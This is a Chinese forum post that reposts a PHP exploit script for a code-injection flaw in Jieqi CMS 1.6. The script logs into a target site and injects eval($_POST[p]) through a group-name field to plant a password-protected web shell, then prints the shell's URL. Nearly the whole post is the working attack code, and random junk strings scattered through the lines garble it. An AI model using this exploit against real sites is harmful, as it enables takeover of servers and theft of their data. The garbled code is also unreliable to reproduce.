杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
4 K% b" a+ b$ R* z! K
4 s* e7 U+ \# {
0 g- @4 `, Q: f: g该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。! Y( w" d* \0 W9 n
需要有一个能创建圈子的用户。
9 r0 L. H3 h! U/ H$ V
. Z5 i; r5 `, v$ w" K3 ]<?php
/ {( G/ p' b1 S. y! a
1 |1 @# p$ N3 N! Y( Zprint_r(' T) k/ b/ e/ h% a
+---------------------------------------------------------------------------+" c; H+ c: m! q; A1 Q3 A. R
Jieqi CMS V1.6 PHP Code Injection Exploit
: I7 Q& A! `$ A+ _by flyh4t' P: E* i1 S6 t# e' `" |
mail: phpsec at hotmail dot com
- C, @' a; N3 C+ a O) dteam: http://www.wolvez.org, i5 D+ v' T9 h/ K2 ^
+---------------------------------------------------------------------------+7 y& Q0 ]# u& z' r9 Y# g
'); /**
8 W; E/ h3 c4 M9 s1 w * works regardless of php.ini settings5 G* W, B/ x" j3 e
*/ if ($argc < 5) { print_r('2 ~; T- {' e+ m) a7 W ?' [
+---------------------------------------------------------------------------+6 ?# z& O0 d- E
Usage: php '.$argv[0].' host path username$ V7 f9 P( S2 Y9 s& T
host: target server (ip/hostname)
^- a: c. d3 G Cpath: path to jieqicms
% e$ c, ]- _% Z# n9 ruasename: a username who can create group2 C+ j: X+ D; {) ?0 S; F' ^8 r
Example:$ N; P3 G ?7 E& H' K
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
Z2 I; t/ k3 W3 b3 H+---------------------------------------------------------------------------+2 G1 f+ ~2 p% w% h- _- |
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
+ U! o ^4 t: j+ s9 s+ {Content-Disposition: form-data; name="gname"/ K, c# P3 m3 k. O& {" B! k7 S
2 F* E- `) `4 r# v) D* d
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
& L9 u0 s) l& Q L( o1 i7 f z- X-----------------------------23281168279961
) H& [0 n1 e7 E) w" c XContent-Disposition: form-data; name="gcatid"# n. t5 {* S; D( l4 S$ n, f8 X
# V4 E" @0 Q1 x! ]8 \6 t* `) t$ M12 y1 A$ {8 q. i: S2 n) V, S- i
-----------------------------23281168279961
! `$ N+ S m" lContent-Disposition: form-data; name="gaudit". ?+ ^1 A6 J6 T
6 A$ u, N( Y! J# ]. u, _# p% x
1
* ]" j- q* S# }6 O-----------------------------23281168279961$ i8 x5 f! d9 ]2 g0 ^+ ]- p
Content-Disposition: form-data; name="gbrief"
/ `1 ~! O% y& ?5 ]% n5 Q
2 r& C1 I0 R* I4 ?4 Q- n# I9 ?1
# y# K1 W. z1 q/ f) a0 b0 o: `-----------------------------23281168279961--3 D$ ^5 \* H$ ~5 ]" o7 n! e
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com, N W- R1 T5 Q$ W% c! f4 L- s
8 J6 H8 @! n$ M0 m" R6 E2 Z/ p
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对